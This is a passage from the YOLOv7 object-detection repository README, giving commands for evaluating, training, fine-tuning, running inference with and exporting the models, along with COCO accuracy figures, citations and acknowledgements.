``` </details> ## Testing [`yolov7.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7.pt) [`yolov7x.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7x.pt) [`yolov7-w6.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-w6.pt) [`yolov7-e6.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-e6.pt) [`yolov7-d6.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-d6.pt) [`yolov7-e6e.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-e6e.pt) ``` shell python test.py --data data/coco.yaml --img 640 --batch 32 --conf 0.001 --iou 0.65 --device 0 --weights yolov7.pt --name yolov7_640_val ``` You will get the results: ``` Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.51206 Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.69730 Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.55521 Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.35247 Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.55937 Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.66693 Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.38453 Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.63765 Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.68772 Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.53766 Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.73549 Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.83868 ``` To measure accuracy, download [COCO-annotations for Pycocotools](http://images.cocodataset.org/annotations/annotations_trainval2017.zip) to the `./coco/annotations/instances_val2017.json` ## Training Data preparation ``` shell bash scripts/get_coco.sh ``` * Download MS COCO dataset images ([train](http://images.cocodataset.org/zips/train2017.zip), [val](http://images.cocodataset.org/zips/val2017.zip), [test](http://images.cocodataset.org/zips/test2017.zip)) and [labels](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/coco2017labels-segments.zip). If you have previously used a different version of YOLO, we strongly recommend that you delete `train2017.cache` and `val2017.cache` files, and redownload [labels](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/coco2017labels-segments.zip) Single GPU training ``` shell # train p5 models python train.py --workers 8 --device 0 --batch-size 32 --data data/coco.yaml --img 640 640 --cfg cfg/training/yolov7.yaml --weights '' --name yolov7 --hyp data/hyp.scratch.p5.yaml # train p6 models python train_aux.py --workers 8 --device 0 --batch-size 16 --data data/coco.yaml --img 1280 1280 --cfg cfg/training/yolov7-w6.yaml --weights '' --name yolov7-w6 --hyp data/hyp.scratch.p6.yaml ``` Multiple GPU training ``` shell # train p5 models python -m torch.distributed.launch --nproc_per_node 4 --master_port 9527 train.py --workers 8 --device 0,1,2,3 --sync-bn --batch-size 128 --data data/coco.yaml --img 640 640 --cfg cfg/training/yolov7.yaml --weights '' --name yolov7 --hyp data/hyp.scratch.p5.yaml # train p6 models python -m torch.distributed.launch --nproc_per_node 8 --master_port 9527 train_aux.py --workers 8 --device 0,1,2,3,4,5,6,7 --sync-bn --batch-size 128 --data data/coco.yaml --img 1280 1280 --cfg cfg/training/yolov7-w6.yaml --weights '' --name yolov7-w6 --hyp data/hyp.scratch.p6.yaml ``` ## Transfer learning [`yolov7_training.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7_training.pt) [`yolov7x_training.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7x_training.pt) [`yolov7-w6_training.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-w6_training.pt) [`yolov7-e6_training.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-e6_training.pt) [`yolov7-d6_training.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-d6_training.pt) [`yolov7-e6e_training.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-e6e_training.pt) Single GPU finetuning for custom dataset ``` shell # finetune p5 models python train.py --workers 8 --device 0 --batch-size 32 --data data/custom.yaml --img 640 640 --cfg cfg/training/yolov7-custom.yaml --weights 'yolov7_training.pt' --name yolov7-custom --hyp data/hyp.scratch.custom.yaml # finetune p6 models python train_aux.py --workers 8 --device 0 --batch-size 16 --data data/custom.yaml --img 1280 1280 --cfg cfg/training/yolov7-w6-custom.yaml --weights 'yolov7-w6_training.pt' --name yolov7-w6-custom --hyp data/hyp.scratch.custom.yaml ``` ## Re-parameterization See [reparameterization.ipynb](tools/reparameterization.ipynb) ## Inference On video: ``` shell python detect.py --weights yolov7.pt --conf 0.25 --img-size 640 --source yourvideo.mp4 ``` On image: ``` shell python detect.py --weights yolov7.pt --conf 0.25 --img-size 640 --source inference/images/horses.jpg ``` <div align="center"> <a href="./"> <img src="./figure/horses_prediction.jpg" width="59%"/> </a> </div> ## Export **Pytorch to CoreML (and inference on MacOS/iOS)** <a href="https://colab.research.google.com/github/WongKinYiu/yolov7/blob/main/tools/YOLOv7CoreML.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> **Pytorch to ONNX with NMS (and inference)** <a href="https://colab.research.google.com/github/WongKinYiu/yolov7/blob/main/tools/YOLOv7onnx.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> ```shell python export.py --weights yolov7-tiny.pt --grid --end2end --simplify \ --topk-all 100 --iou-thres 0.65 --conf-thres 0.35 --img-size 640 640 --max-wh 640 ``` **Pytorch to TensorRT with NMS (and inference)** <a href="https://colab.research.google.com/github/WongKinYiu/yolov7/blob/main/tools/YOLOv7trt.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> ```shell wget https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-tiny.pt python export.py --weights ./yolov7-tiny.pt --grid --end2end --simplify --topk-all 100 --iou-thres 0.65 --conf-thres 0.35 --img-size 640 640 git clone https://github.com/Linaom1214/tensorrt-python.git python ./tensorrt-python/export.py -o yolov7-tiny.onnx -e yolov7-tiny-nms.trt -p fp16 ``` **Pytorch to TensorRT another way** <a href="https://colab.research.google.com/gist/AlexeyAB/fcb47ae544cf284eb24d8ad8e880d45c/yolov7trtlinaom.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> <details><summary> <b>Expand</b> </summary> ```shell wget https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-tiny.pt python export.py --weights yolov7-tiny.pt --grid --include-nms git clone https://github.com/Linaom1214/tensorrt-python.git python ./tensorrt-python/export.py -o yolov7-tiny.onnx -e yolov7-tiny-nms.trt -p fp16 # Or use trtexec to convert ONNX to TensorRT engine /usr/src/tensorrt/bin/trtexec --onnx=yolov7-tiny.onnx --saveEngine=yolov7-tiny-nms.trt --fp16 ``` </details> Tested with: Python 3.7.13, Pytorch 1.12.0+cu113 ## Pose estimation [`code`](https://github.com/WongKinYiu/yolov7/tree/pose) [`yolov7-w6-pose.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-w6-pose.pt) See [keypoint.ipynb](https://github.com/WongKinYiu/yolov7/blob/main/tools/keypoint.ipynb). <div align="center"> <a href="./"> <img src="./figure/pose.png" width="39%"/> </a> </div> ## Instance segmentation (with NTU) [`code`](https://github.com/WongKinYiu/yolov7/tree/mask) [`yolov7-mask.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-mask.pt) See [instance.ipynb](https://github.com/WongKinYiu/yolov7/blob/main/tools/instance.ipynb). <div align="center"> <a href="./"> <img src="./figure/mask.png" width="59%"/> </a> </div> ## Instance segmentation [`code`](https://github.com/WongKinYiu/yolov7/tree/u7/seg) [`yolov7-seg.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-seg.pt) YOLOv7 for instance segmentation (YOLOR + YOLOv5 + YOLACT) | Model | Test Size | AP<sup>box</sup> | AP<sub>50</sub><sup>box</sup> | AP<sub>75</sub><sup>box</sup> | AP<sup>mask</sup> | AP<sub>50</sub><sup>mask</sup> | AP<sub>75</sub><sup>mask</sup> | | :-- | :-: | :-: | :-: | :-: | :-: | :-: | :-: | | **YOLOv7-seg** | 640 | **51.4%** | **69.4%** | **55.8%** | **41.5%** | **65.5%** | **43.7%** | ## Anchor free detection head [`code`](https://github.com/WongKinYiu/yolov7/tree/u6) [`yolov7-u6.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-u6.pt) YOLOv7 with decoupled TAL head (YOLOR + YOLOv5 + YOLOv6) | Model | Test Size | AP<sup>val</sup> | AP<sub>50</sub><sup>val</sup> | AP<sub>75</sub><sup>val</sup> | | :-- | :-: | :-: | :-: | :-: | | **YOLOv7-u6** | 640 | **52.6%** | **69.7%** | **57.3%** | ## Citation ``` @inproceedings{wang2023yolov7, title={{YOLOv7}: Trainable bag-of-freebies sets new state-of-the-art for real-time object detectors}, author={Wang, Chien-Yao and Bochkovskiy, Alexey and Liao, Hong-Yuan Mark}, booktitle={Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)}, year={2023} } ``` ``` @article{wang2023designing, title={Designing Network Design Strategies Through Gradient Path Analysis}, author={Wang, Chien-Yao and Liao, Hong-Yuan Mark and Yeh, I-Hau}, journal={Journal of Information Science and Engineering}, year={2023} } ``` ## Teaser YOLOv7-semantic & YOLOv7-panoptic & YOLOv7-caption <div align="center"> <a href="./"> <img src="./figure/tennis.jpg" width="24%"/> </a> <a href="./"> <img src="./figure/tennis_semantic.jpg" width="24%"/> </a> <a href="./"> <img src="./figure/tennis_panoptic.png" width="24%"/> </a> <a href="./"> <img src="./figure/tennis_caption.png" width="24%"/> </a> </div> YOLOv7-semantic & YOLOv7-detection & YOLOv7-depth (with NTUT) <div align="center"> <a href="./"> <img src="./figure/yolov7_city.jpg" width="80%"/> </a> </div> YOLOv7-3d-detection & YOLOv7-lidar & YOLOv7-road (with NTUT) <div align="center"> <a href="./"> <img src="./figure/yolov7_3d.jpg" width="30%"/> </a> <a href="./"> <img src="./figure/yolov7_lidar.jpg" width="30%"/> </a> <a href="./"> <img src="./figure/yolov7_road.jpg" width="30%"/> </a> </div> ## Acknowledgements <details><summary> <b>Expand</b> </summary> * [https://github.com/AlexeyAB/darknet](https://github.com/AlexeyAB/darknet) * [https://github.com/WongKinYiu/yolor](https://github.com/WongKinYiu/yolor) * [https://github.com/WongKinYiu/PyTorch_YOLOv4](https://github.com/WongKinYiu/PyTorch_YOLOv4) * [https://github.com/WongKinYiu/ScaledYOLOv4](https://github.com/WongKinYiu/ScaledYOLOv4) * [https://github.com/Megvii-BaseDetection/YOLOX](https://github.com/Megvii-BaseDetection/YOLOX) * [https://github.com/ultralytics/yolov3](https://github.com/ultralytics/yolov3) * [https://github.com/ultralytics/yolov5](https://github.com/ultralytics/yolov5) * [https://github.com/DingXiaoH/RepVGG](https://github.com/DingXiaoH/RepVGG) * [https://github.com/JUGGHM/OREPA_CVPR2022](https://github.com/JUGGHM/OREPA_CVPR2022) * [https://github.com/TexasInstruments/edgeai-yolov5/tree/yolo-pose](https://github.com/TexasInstruments/edgeai-yolov5/tree/yolo-pose) </details>
Implementation of paper - YOLOv7: Trainable bag-of-freebies sets new state-of-the-art for real-time object detectors
scaled-yolov4,yolor,yolov3,yolov4,yolov7,darknet,pytorch
1
30
242
134
1,414
9
0